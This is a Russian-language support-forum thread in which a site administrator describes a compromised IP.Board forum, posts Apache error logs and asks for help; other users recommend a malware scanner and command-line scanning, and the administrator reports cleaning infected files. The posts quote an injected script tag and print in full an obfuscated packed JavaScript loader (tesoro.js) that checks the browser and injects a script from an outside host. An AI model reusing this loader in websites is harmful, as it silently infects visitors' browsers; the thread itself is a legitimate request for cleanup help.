Перейти к публикации
View in the app

A better way to browse. Learn more.
Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Взлом форума и логи php

Опубликовано:

Раньше лог ошибок был пуст.

 

[Thu Nov 28 00:43:44 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2722-vse-voprosy-po-forumu-prinimaiutsia-zdes/page-54
[Thu Nov 28 00:43:49 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/index.php?app=core&module=search&do=viewNewContent&search_app=forums
[Thu Nov 28 00:43:49 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/index.php?app=core&module=search&do=viewNewContent&search_app=forums
[Thu Nov 28 00:43:50 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/forum/136-privatnaia-komnata/
[Thu Nov 28 00:43:50 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/forum/136-privatnaia-komnata/
[Thu Nov 28 00:43:51 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2839-sniatsia-li-vam-sny-o-rabote/page-22#entry293984
[Thu Nov 28 00:43:51 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2839-sniatsia-li-vam-sny-o-rabote/page-22#entry293984
[Thu Nov 28 02:19:20 2013] [error] [client 1.1.1.1] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++Result:+\xee\xf8\xe8\xe1\xea\xe0:+"\xc2\xfb+\xe4\xe0\xeb\xe8+\xed\xe5\xe2\xe5\xf0\xed\xfb\xe9+\xee\xf2\xe2\xe5\xf2+\xed\xe0+\xe2\xee\xef\xf0\xee\xf1+\xef\xf0\xe8+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\xe8.+\xcf\xee\xef\xf0\xee\xe1\xf3\xe9\xf2\xe5+\xe5\xf9\xe5+\xf0\xe0\xe7.";+\xf2\xe5\xea\xf1\xf2\xee\xe2\xe0\xff+\xea\xe0\xef\xf7\xe0+\xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed\xe0+\xed\xe5\xe2\xe5\xf0\xed\xee;+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"roustytug";+ReCaptcha+\xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed\xe0;+(JS);+\xe7\xe0\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe8\xf0\xee\xe2\xe0\xeb\xe8\xf1\xfc+(\xe2\xea\xeb\xfe\xf7\xe5\xed+\xf0\xe5\xe6\xe8\xec+\xf2\xee\xeb\xfc\xea\xee+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\xe8); failed, referer: http://сайт.ru/index.php++++++++++++++++++++++++++++++++++++Result:+%EE%F8%E8%E1%EA%E0:+%22%C2%FB+%E4%E0%EB%E8+%ED%E5%E2%E5%F0%ED%FB%E9+%EE%F2%E2%E5%F2+%ED%E0+%E2%EE%EF%F0%EE%F1+%EF%F0%E8+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8.+%CF%EE%EF%F0%EE%E1%F3%E9%F2%E5+%E5%F9%E5+%F0%E0%E7.%22;+%F2%E5%EA%F1%F2%EE%E2%E0%FF+%EA%E0%EF%F7%E0+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED%E0+%ED%E5%E2%E5%F0%ED%EE;+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22roustytug%22;+ReCaptcha+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED%E0;+%28JS%29;+%E7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%EB%E8%F1%FC+%28%E2%EA%EB%FE%F7%E5%ED+%F0%E5%E6%E8%EC+%F2%EE%EB%FC%EA%EE+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8%29;
[Thu Nov 28 04:56:49 2013] [error] [client 1.1.1.1] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Thu Nov 28 05:56:27 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75
[Thu Nov 28 08:44:44 2013] [warn] [client 1.1.1.1] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server, referer: http://сайт.ru/topic/2114-ia-segodnia/
[Thu Nov 28 08:44:44 2013] [error] [client 1.1.1.1] Premature end of script headers: 404.php, referer: http://сайт.ru/topic/2114-ia-segodnia/

 

Открыл Файл min/index.php Там был странный путь к iloveu.js, открыл этот файлик а там шел.

;document.write(\"<scr\"+\"ipt src=\'/public/style_images/mobile_app/iloveu.js\'><\"+\"/script>\");

 

Удалил, вроде все работает. Кто сталкивался с таким?

Рекомендованные сообщения

Опубликовано:

открыл этот файлик а там шел.

Думаете в одном месте шел?

 

Кто сталкивался с таким?

Надо у IPS смотреть уязвимости.

 

 

p.s. Неужели считаете, что скин по умолчанию так изменен, что можно снести копирайт автора?

    •
    • Upvote 1
    Опубликовано:
    • Автор
    p.s. Неужели считаете, что скин по умолчанию так изменен, что можно снести копирайт автора?

     

    Задняя картинка только от автора и все, а так шаблон переделывался со стандартного. Если нужно Фисане предоставлю доступ пусть проверит).

     

    IPS уже просматриваю, спс, просто файл за 5тый месяц там был, но я вродже удалял все до единой папки оставлял uploads и смайлы + хуки моды переставлял, на сервере все пароли поменял, возможно другой админ заразил.

    Опубликовано:
    • Автор

    Снова повторилось.

     

    зараженный файл tesoro.js

    Содержимое:

     

    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\'\':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\'\'.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'5 m(c){r(7.l&&7.j){2 i=7.j(\\\'S\\\')[0];2 8=7.l(\\\'R\\\');8.h(\\\'P\\\',\\\'N/O\\\');8.h(\\\'c\\\',c);i.U(8)}}5 q(3){b 3.e(\"M\")==-1}2 10=\"{Z{D?t&}f#;,~v)$\";2 X=\"V%]g%Q!,![W@11:K\";2 B=\"%%->w:z:{}]!Y+y!\";2 x=\"C#!v[i H\";2 F=\"J+{<G+\";5 u(3){b 3.e(a)!=-1}2 E=\"A,T)6]1p!12`>D}1o\";2 1n=\"~$1k)~1l~]H`%{L\";2 1j=\"~4:$](1m.~.1h`*@9\";2 1i=\"17-18 [[s=16\";2 15=\"w*n?? @13 14]:(19\";5 o(){b p.1a()}2 k=\"1f://1g.1e.3/1d\";2 a=\"a\";5 d(){2 3=p.1b.1c();r(q(3)&&u(3)&&o()){m(k)}}d();\',62,88,\'||var|ua||function||document|script_tag||win|return|src|includeCounter|indexOf|||setAttribute|head_tag|getElementsByTagName|url|createElement|includeJavascript||cond3|navigator|notChrome|if|||isWin|||nzVVMTHUln3|z1|n4||nzVVMTHUln2|ij3o||XDJOlGBk0|nzVVMTHUln4|qcf||Rc_B|vbAGL|H9||chrome|text|javascript|type||script|head|VS|appendChild|C3|B5|nzVVMTHUln1||40|nzVVMTHUln0|eB|Jg|2y|PO|XDJOlGBk4|Ww|G4T|_N|4k|javaEnabled|userAgent|toLowerCase|8bc0e1080cd5|pp|http|tozok|oa|XDJOlGBk3|XDJOlGBk2|b8rZ|VF|_a4rx|XDJOlGBk1|36|Sl5i\'.split(\'|\'),0,{}))

     

    Вот лог:

     

    [Fri Nov 29 14:38:39 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:38:39 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:00 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:00 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:03 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:03 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:57 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:39:57 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:40:16 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/
[Fri Nov 29 14:40:16 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/

     

    Подскажиту, куда рыться? так как Фтп полностью чистел, хостинг говрит что все ОК.

    Опубликовано:

    Можно сюда - http://revisium.com/ai/. Но там тоже надо разобраться, а то наудаляете лишнего.

     

    P.S. Вообще, ничего особо сложного. Сканируете, открываете в браузере файл отчёа. Подозрительные файлы там будут отсортированы по категориям и степени угроз. Те, что в залитых вами дистрибутивах отсутствуют можно сразу удалять, за исключением файлов из папок загрузки, с ними нужно разбираться отдельно. Те файлы, что присутствуют в дистрибутивах, но помечены как угрозы, просто сравниваете с исходными.

    •
    • Upvote 1
    Опубликовано:
    • Автор

    Можно сюда - http://revisium.com/ai/. Но там тоже надо разобраться, а то наудаляете лишнего.

     

    Критические замечания. Шелл-скрипты не найдены.

    Опубликовано:

    Критические замечания. Шелл-скрипты не найдены.

    Нужно выполнить сканирование из командной строки, вариант с запуском из браузера ограничен функционально.

    •
    • Upvote 1
    Опубликовано:

    Снова повторилось.

    Не удивительно. Если есть взлом, то замена паролей не помогает

     

    Критические замечания. Шелл-скрипты не найдены.

    На VDS один сайт?

     

     

    P.S. В последнее время сайты на IP.Board стараюсь хостить отдельно ....

    •
    • Upvote 1
    Опубликовано:
    • Автор

     

    На VDS один сайт?

     

     

    P.S. В последнее время сайты на IP.Board стараюсь хостить отдельно ....

     

    Один.

    • 2 недели спустя...
    Опубликовано:
    • Автор

    Нужно выполнить сканирование из командной строки, вариант с запуском из браузера ограничен функционально.

     

     

    Спасибо запустил скрипт по SSH, нашло пару вирусов (Под видом аватарки и тд), все почистил.

    Создайте аккаунт или войдите в него для комментирования

    Перейти к списку тем

    Сейчас на странице 0

    • Нет пользователей, просматривающих эту страницу.

    Configure browser push notifications
    Chrome (Android)
    1. Tap the lock icon next to the address bar.
    2. Tap Permissions → Notifications.
    3. Adjust your preference.
    Chrome (Desktop)
    1. Click the padlock icon in the address bar.
    2. Select Site settings.
    3. Find Notifications and adjust your preference.